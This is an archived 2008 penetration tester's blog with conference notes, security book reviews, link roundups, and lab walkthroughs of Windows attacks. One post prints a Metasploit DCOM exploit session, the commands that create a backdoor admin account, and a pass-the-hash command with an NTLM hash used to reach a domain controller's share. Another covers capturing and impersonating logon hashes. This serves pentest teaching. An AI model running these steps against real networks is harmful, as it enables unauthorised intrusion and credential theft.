Thursday, March 27, 2008
I watched Rich Mogull's Understanding and Preventing Data Breaches
and the l0pht Panel.
Rich's talk was really interesting right up until the video stops short of the talk finishing :-(
and the l0pht panel was really interesting as well. Those guys did so much for the industry it was really interesting to hear them talk about the "good ol' days" and see what they are all doing now.
To do: watch Dan Geer's keynote.
I also caught Chris Wysopal's talk at Black Hat D.C. on Classification and Detection of Application Backdoors. It was about all the "extra" code that was put into different projects and programs over the years and timelines of how long it took for those "additions" to be discovered.
couple of bloggers did writeups on it:
dre over at TS/SCI
David Maynor over at Errata Security
I'm sure there is more.
The winner was Charlie Miller of Independent Security Evaluators
Checking out the site it looks like they have been doing work on OS X vulnerabilities and research into selling 0day. Interesting.
Link: The legitimate vulnerability market: the secretive world of 0-day exploit sales
Charles Miller, Independent Security Evaluators
To me it was brilliant marketing on behalf of ISE. I don't really deal with 0day with the exception of begging for them, but I imagine that a remote preauth on any of the 3 OS's involved in the pwn2own contest is worth way more than $20k on both the "dark side" and "good side" of "responsible" disclosure. On the other hand, ISE gets to be on the front page of every security mag and blog for the next few days for the price of giving up one client side exploit and they get $10,000 on top of it. Cheers guys. Job well done. Bonus points for pwning the system.
and more fun from: http://www.securityevaluators.com/independent_eva.html
Services we do not provide:
Don't pay us to run nessus
At ISE, we offer specialized expert security services. Therefore, we do not perform commodity services such as automated networks scans and firewall configuration.
ISE also does not do Common Criteria evaluation.
Life is too short.
Monday, March 24, 2008
He gives 3 attack scenarios when testing:
1. Track the clicks (low impact).
2. Plant a back door without exploitation (medium impact).
3. Exploit a client-side vulnerability (high impact).
Dean did a post about spear phishing during a pen-test, which basically covered the 1st option. We used google analytics to track who clicked on the initial link then a 2nd one for who actually entered data. Of course we dont know if that data was any good, but someone put "something" and hit the Enter button.
I would propose a 4th category which is i actually use the credentials to see if i can escalate on the network or data mine. its important to see just how much damage can be done when a user gives up a network logon to the badguy.
anyway, Lenny's paper is worth a read as well as taking a look at Jay Beale's talk on "They're Hacking Our Clients" http://toorcon.org/2007/talks/63/ClientVA-Toorcon9-Oct2007.pdf
They're is also an associated site that hasnt been updated since last year :-(
I'm not one of those "security predictions" kind of people but organizations should start moving to conducting client side exploitation during pen tests as both a training event and to see what kind of access can be gained and damage done when credentials are obtained. instead of 1) saying we have training program so we are good or 2) saying yes we know our clients are jacked up so go ahead and just test the network defenses anyway.
Thursday, March 20, 2008
-Chris is slated to talk about "New School Information Gathering" on Friday
-Dean is supposed to talk as well
Here are the details:
ChicagoCon 2008s: White Hats Come Together in Defense of the Digital Frontier
May 12 – 18, 2008
The Spring Edition of ChicagoCon features all new keynoters, additional security boot camps, exams on-site followed by a two-day ethical hacking conference. And without an exhibit hall full of sales pitches, you're free to learn from the pros, network with peers and advance your InfoSec career. Not just another boot camp or hacker con, ChicagoCon adds value to your training dollars with top instructors and well known certifications. 13 courses including CISSP, CEH, CHFI, Advanced Hacking, BackTrack to the Max (First Time EVER), Cisco, Microsoft, SANS, SOX, Security+ and more. The 2 days of “Con” Activities May 16 – 17 are only $100 (free for training students) and offers presentations, breakout sessions & hacking contests. >From the novice, to the ultimate techie, to the CISO chair... everyone interested in a career in security will find something at ChicagoCon, your one-stop shop for security training and certification. Keynotes: Geahan (FBI), Echemendia (Hacking Instructor), McOmie (TruTV's Tiger Team), Murray (Neohapsis) & Carpenter (SANS, Intelguardians). Presented by www.ethicalhacker.net.
Potential for something great was there but wasn't delivered
I'm going to take a harsh stance on this book, mostly because this book had potential to really build upon all the information publicly available for Metasploit and really make a great book on Metasploit internals and advanced usage. Instead it seems like current public/free information was just rehashed and new information not updated for the 3.x branch of MSF.
What I consider the "meat" of this book, and what should have made this a 4 or 5 star book, covers the Metasploit Framework 2.x branch and NOT the current 3.x branch. By "meat" I mean the case studies covering exploitation using MSF. The major difference between the two is that 2.x was written in Perl and 3.x in Ruby. To be fair the first 5 chapters cover using MSF 3.x, but I really didn't feel they covered much, if anything, that's not out on the net with the exception of Chapter 5 (Adding new Payloads). "Using" Metasploit has been covered a million times in a million other books. A book specifically on Metasploit should have covered things not covered in every other hacking book.
Chapter 1 is an "Introduction to Metasploit." If you haven't ever used the tool and didn't want to RTFM, then "maybe" it would be useful for you. Most of the material I felt could be found on the Metasploit main support page, the wiki, or via google, but mostly the first two. I'm also not sure why there are pages and pages of current payloads and exploits with no explanations as to why I would use one type of payload versus another especially for the obscure ones like find tag or ordinal payloads. Doing a "show exploits" or "show payloads" without dialogue on the differences adds little value. The Leveraging Metasploit on Penetration Tests section is one paragraph :-(
Chapter 2 is "Architecture, Environment, and Installation." There are 2-3 pages on locking down a system. Why is that included? Very random. Let me cover the installation covered in the book for you. Windows, double click the executable. *nix, download via svn. That's about the level of detail we get...sigh :-(
Chapter 3 is a whopping 7 pages including the FAQ section on "Metasploit Framework and Advanced Environment Configurations." That chapter covers what is in the directories of your msf installation and using the setg command.
Chapter 4 is "Advanced Payload and Add-on Modules." Covers some old information on meterpreter and some meterpreter basics, the stuff on the net covers it in far more detail. Decent coverage of the VNC Inject payload, crappy coverage of the PassiveX payload, ok coverage of auxiliary modules and a mention of db autopwn.
Chapter 5 is "Adding New Payloads." Chapter 5 is the best chapter in the book because it discusses something...here it goes...NEW! and related to MSF 3.x. Chapter 5 is an excellent chapter walking us thru building a SIP Invite spoofer auxiliary module. Had the whole book been of this caliber it would have been a 5 star book.
The case studies should have been rewritten to work with MSF 3.x, they are all for 2.x. They are good and contain the required detail (but I didn't not work through all the examples yet) Things are similar between the branches and you can probably muddle through the conversions but it makes no sense for the first half of the book to be about 3.x and the meat to be about 2.x. At a minimum a chapter or section on converting exploits from 2.x to 3.x was in order, but was not included.
I didn't find Appendix B, "Building a Test Lab for Penetration Testing" to be all that helpful either. I think it's a reprint from Penetration Tester's Open Source Toolkit v2, but can't confirm because I don't have that book.
Tuesday, March 18, 2008
anyway, what the hell do i know, on with the link:
Monday, March 17, 2008
here's the link:
and here's a screenshot:
I don't believe I'll ever have to crack a password (least for windows) again :-) --take that NTLM and NTLMv2!
Sunday, March 16, 2008
Are your devices pre-0wned?? Time to re-look that great deal on goods/labor we get from China http://www.veracode.com/blog/?p=82
FinCEN and how it helped catch Spitzer: http://blogs.zdnet.com/BTL/?p=8211
Weak passwords strike again: http://blog.liquidinfo.net/2008/03/case-of-weak-password.html
inguma 0.0.7.2, looks like the tool is coming around. looks like its time for another go with it:
XSS in SNMP web interfaces, check out Adrian Pastor's comment: http://www.sensepost.com/blog/2120.html#comments
Seven deadly pen-test sins: http://www.matasano.com/log/1026/seven-deadly-pen-test-sins/
and Mike Andrews commentary on it: http://www.mikeandrews.com/2008/03/15/seven-deadly-pen-test-sins/
(Ab)using scheduled tasks to elevate privileges over on sensepost blog/videos
and Elevating Privileges using Sygate's Personal Firewall http://www.sensepost.com/videostatic/sygate/sygate.html
Saturday, March 15, 2008
I'm going to consider this post half finished because i dont think iam.exe and iam-alt.exe are working properly for me yet. hopefully Hernan will respond to this post or the comments i made on his blog and get me fixed up.
ok so on with it. the scenario goes that you have a local admin account on a box, which is easy to get from a remote exploit but no domain user permissions. From a data mining perspective or for further enumeration even domain user permissions are nice. At a minimum i can browse public shares in the domain for info.
ok first step is that i have already created my local admin account on the box, i've uploaded my tools whosthere-alt.exe, its dll and iam-alt.exe and its dll.
lets log in via psexec and run whosthere-alt.exe
we can see that we have logged in via our test account, and there is a vmware user account that proabably doesnt have any permissions. whosthere-alt.exe has a cool feature that it will listen indefinitely and log to a file, so you can start the process and wait for someone hopefully with domain admin to log into the box and it will capture those hashes for you.
let's check out the help options for whosthere-alt.exe and iam-alt.exe and using whosthere-alt.exe to capture logins for us.
as you can see in the image above; whoami says i am test/segfault and we start running whosthere-alt in logging mode (-i -o bigfun.txt) and then in the 2nd shell we check our bigfun.txt to see if anyone new has logged in and a user "root" has logged in.
from there we use iam-alt.exe to become user root, it appears from the output that its working i couldnt confirm that it was working, whoami.exe still said i was test and starting any processes resulted in them still being owned by test :-(
iam.exe/iam-alt.exe not working is not the end of the world though (in fact i'm sure its user error), if the account you gathered through whosthere.exe is admin+ you can still use the psexec module in metasploit to pass the hash as well and get yourself a shell.
Reliance on author's tool detracts from books potential
Thanks to McGraw-Hill for my review copy.
Based on my review criteria: http://carnal0wnage.blogspot.com/2008/03/book-review-criteria.html this book should have easily been a 4 or 5 star book, but I gave it 3 stars for its major flaw. Its major flaw is that it only talks about iSec partner's SecurityQA Toolbar as a tool for testing for the different types of web application vulnerabilities. Only discussing one closed source, for pay tool, that only runs on Windows is really disappointing from a security professional standpoint. I really expected a good snapshot in time on the DIFFERENT tools and techniques for doing web 2.0 auditing. There are tons of “for-pay” and more importantly FREE web application scanners and tools that look for the same vulnerabilities discussed in the book and the fact that they don't mention any other tools or methods is very disappointing.
Now that the above is out of the way...lets get on with the likes and dislikes.
-The analysis of the samy worm is excellent. They break the code apart and really analyze what's going on and why it worked at the time.
-The chapter on ActiveX security is excellent. It covers a lot of ground on why ActiveX controls are bad, how to fuzz them and how to defend against them.
-The whole first part of the book on Web 1.0 vulnerabilities is well written, I had just finished XSS attacks and having that background helped a lot with the relevant chapters in HE Web 2.0.
-The book is short, about 246 pages, that's probably too short for the price for a security book.
-A good chunk of the chapters cover over and over installing and using their SecurityQA Toolbar, I only need it once, if that.
-I think the book stops a bit short of actually exploiting Web 2.0 vulnerabilities. It talks a lot about identifying which 2.0 framework an application was built with and identifying different methods in that application, if debug functionality is enabled, and finding hidden URLs but how I exploit SQL injection issues or XPATH injection or LDAP injection issues IN web 2.0 applications is missing. That was the core problem with web 1.0, its still a valid and dangerous entry point for web 2.0 and should have been covered. Hacking Exposed is generally about exploiting vulnerabilities and not stopping at identifying them which is where the book seems to have stopped.
Overall the authors are obviously very knowledgeable about the subject. One of the other reviewers mentioned that it goes from technically very easy to very difficult even within chapters and I think this is true. The code sample for the examples they give are great and their explanations of web 1.0 and the web 2.0 threats is very well written with good examples. Like I said, had it not been for their fixation with their own tool as the only option we have for web 1.0 and 2.0 testing this would have easily been a 4 star book. For those a bit more interested in web 2.0 I would recommend checking out Shreeraj Shah's Web 2.0 Security and Hacking Web Services books and his website which has free web 2.0 auditing tools.
Friday, March 14, 2008
Wednesday, March 12, 2008
No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing by Johnny Long
Solid advice on securing the human vulnerability
Johnny Long has a great knack for taking what should be common sense observations on human vulnerabilities and making them unique, entertaining, and most importantly actionable. The book really seems to be a book to go along with his numerous “No Tech Hacking” talks he has given at several security conferences. If you want an example check out the 2007 Shmoocon Archives: shmoocon.org/2007/presentations.html
Here are the chapters:
Social Engineering with Jack Wiles
All of the chapters are pretty good, I particularly liked the Physical Security, P2P Hacking, and Kiosks (even though it was a short chapter). Again, a lot of what he talks about is common sense and taken from his talks he gives a security conferences. But it comes from a guy that gets paid to break into buildings for a living so you can trust the advice and situations to be pretty close to reality.
Things I liked about the book:
-The Physical Security section talks about defeating different types of locks and security systems. It was good relevant content with good advice on how to fix it. The Kiosk chapter talks a little bit about breaking out of Kiosks and information you can gather. Using P2P to look for sensitive documents is a good idea as well. Really all the chapters had valuable information in them. In plain words he sums up relevant and dangerous security issues that target the human element of security.
-The large font and lots of pictures make the book a quick read. I also like that there were pictures to go along with all the points he was trying to make. His “arrest me face” on page 95 is the best.
-The book is pretty much without typos and editing issues which says a lot for a syngress book.
-The book is useful for both technicians and managers, I feel like i can give the book to both the techies and management and have them both get something out of it.
Some things I didn't like about the book:
-The book has a slight condescending tone. I think this is the author's attempt to be funny, and in person I think he could have pulled it off. But in print it really comes across as a “you are dumb, so dumb I have to write a book about hacking you without technology to show you how dumb you are.” It doesn't make the book “bad” its just annoying at times.
-The tailgating section (page 24) slams a person for wearing their badge INSIDE and says she is not security conscious. Why would you NOT where your badge inside? On one hand he complains about people not challenging him because of his fake badge or lack of a badge and then he says that wearing a badge inside is an opportunity for someone who sneaks in to take pictures of it, well guess what, they are already inside, there are other bigger issues now. In my opinion, badge on inside=good, badge on outside at lunch=bad.
-The book suffers a bit from the "Everything must be secure... damn the functionality" problem that a lot of security researchers and hard core security proposals suffer from. What I mean by all that is sometimes security people lose sight of why things are they way they are or the fact that changing the way things are done would hinder actually getting work done. The best example I can come up with from the book is his discussion of DoD decals on cars (in the vehicle surveillance chapter) and how they give away too much information. While not arguing his point on giving away information, I'd like to see his proposal for a better solution to access control on DoD bases. I'd also argue that oil change stickers showing where I got my oil changed (that may give you some information on where I live or work) are far less dangerous than that person just following me to home or work now that they have me and my car associated with one another.
5 stars: Book brought new detail or information to light, nothing else like it out there or a great update. Well written, few typos, well edited.
4 stars: Good information but nothing "new", written pretty well; good but not outstanding, has some issues.
3 stars: In some form or fashion the book has flaws whether it be editing or content, usually just average content.
2 stars: Shouldn't be used to start fires, but possibly pretty close.
1 stars: Probably shouldn't have been published and I want my money back, brings nothing of value whatsoever.
**Ideally, all those stars are qualified/explained with the write-up
If you disagree or have some things to add, PLEASE leave a comment :-)
Tuesday, March 11, 2008
and a TSA rant from my last trip:
While TSA didnt hold me up I would have preferred they did. Just got back from an overseas flight. We cram all our gear for assessments in those big black pelican cases. I spent about 45 minutes getting everything packed in there nice and tight and where nothing would rattle around and break, since I had signed for it and we have the "you break it, you bought it policy." So I get to the airport early, some times no ones cares about the big black case sometimes they do. I also got a nice fat padlock for it, again, sometime they care sometimes they don't.
That morning they did, but I got lucky. I must have had the most polite nice TSA guy i have ever met. He was like what's in the case, I'm like computer equipment, he's like ok, iI have to look inside whats the combo? He gets the case open, starts going through it. He's behind a screen so i can only see his head and not what he is doing. I go can you please make sure you put things back in there properly i have to pay if stuff gets broken and he's like sure sure no problem. I'm waiting outside the roped area to make sure it everything gets locked up properly and back on its way. Finally i hear him closing it up and lock and throw the thing on the conveyor belt, smiles and says everything is good to go and to have a nice flight.
I get to the hotel on the other end like 20 hours later and open the case. EVERYTHING is all over the place not even remotely where it was placed. harddrives, switches, cables all over the case and he even put the laptops back in with the screens facing out so a nice hard kick to the bottom of the case should have taken care of me getting any work done on the trip (will save that piece of knowledge for later). Anyway, just annoying that the guy was so nice all the while doing such a crappy job. Thankfully nothing was broken. I understand the need to protect us, and i'm glad people are there trying to do that, but if they cant have enough respect for our stuff to put it back in there right or allow US to put it back in there then don't open the crap up.
Sunday, March 9, 2008
-Even though you were invited by someone in that organization to make security better, there are plenty of people in that organization that DIDN'T invite you and don't want you there. Especially if it requires them doing some work to get you IP space or a place to put all your gear or just requiring them get to get off their ass in general. Not to mention you are there to see how good a job they have been doing, and if they haven't been doing a good job...
-Be prepared to be blamed for any and all network issues that arise while you are there doing your assessment, even if you are out to dinner :-) The customer had a network outage occur while I was at dinner. Now even though DoS was not in the scope...instead of the admin's actually doing some work to determine the cause of the outage I was immediately blamed as doing a Denial of Service attack on the subnet. Apparently from outside the firewall AND through my phone AND while I was at dinner AND was able to make this happen a non-public network. How's that for some kung fu!
-Be prepared for that person that invited you in #1 to not be real thrilled when you succeeded. In fact, be prepared for them to be really pissed when you do your low tech hacking into their secure building or if you totally own their network.
**The rest of this probably is in some hacking book
-If you share IP space with people, building, and computers you have no control over, you may want to treat all those things as hostile into your network. Blindly trusting data and traffic coming from computers based on IP has never been a good thing and still isnt.
-Other things in the do not do list
* Do not broadcast your virtual meetings via VNC without authentication especially if you blindly trust IPs in your range that you don't control, watching briefings and meetings is always fun through unauthenticated VNC sessions.
* LM Hashes are just bad in so many ways I cant even start, especially if your patch policy is bad
* A password policy of no complexity, length or age requirements isnt much of a password policy
Link to article on hakin9
if someone has serious heartburn about not wanting to sign up, leave a comment and maybe i'll get motivated to put it on the carnal main site or email it to you.
Wednesday, March 5, 2008
you can read more on msvctl here:
it essentially dumps current hashes from memory, you can then take one of those hashes and "pass it" and run commands as that user. so no more needing to crack hashes, you can pass it and be that person without it.
The scenario we find ourselves in at work, and why i am interested in getting this crap working is that, we pop a box on a domain with a remote exploit but we usually end up as SYSTEM. SYSTEM can do whatever it wants EXCEPT anything on the domain. i can do whatever i want on that box, but i dont have any privileges as far as the DC is concerned and that sux, because the goal is usually to be a domain or enterprise admin. we normally put a netcat type trojan in the startup folder and wait for an admin to log in, waiting sux, and i'm not a patient guy.
the demo in the link above he does with psexec, i'm on linux and things werent quite working out for me and it wasnt working with a meterpreter shell (probably a token issue thats probably why he did it with psexec). anyway, what i did was...
1. got a remote shell via dcom (yeah i know, if a demo, so shut up)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129 ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129 ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
2. created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpeter
meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
3. created a local account on the box and added it to the local admin group
meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.
C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.
4. logged into the box with my new local account via RDP
5. to test privileges i tried to map to the C drive of the domain controller
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.
Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
6. CD'ed into the msvctl temp directory and did a list to see what hashes were available. we see that we our credentials and domain user chris has logged on recently.
7. inject a cmd.exe using LSOCORP\Chris hash and get a cmd.exe shell with his permissions.
C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404
ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '
**at this point i had another cmd.exe shell pop up, i was then able to map a share to the domain controller using that cmd.exe
C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.
The command completed successfully.
New connections will be remembered.
Status Local Remote Network
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878
Directory of Z:\
05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free
Tuesday, March 4, 2008
To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory.
With full access to the memory, the tool can then modify Windows' password protection code, which is stored there, and render it ineffective."Very cool, of course most people know that if you have physical access to a computer its essentially yours anyway. The idea was originally presented in 2006 at Ruxcon, and now the code is released...now where did i put that firewire cable...
Article Link: http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html
Monday, March 3, 2008
bottom line is that even if you "flash" the drive every nite or if its non-persistent you might want to make sure the "fresh" image isnt vulnerable to some old ass remote exploit :-)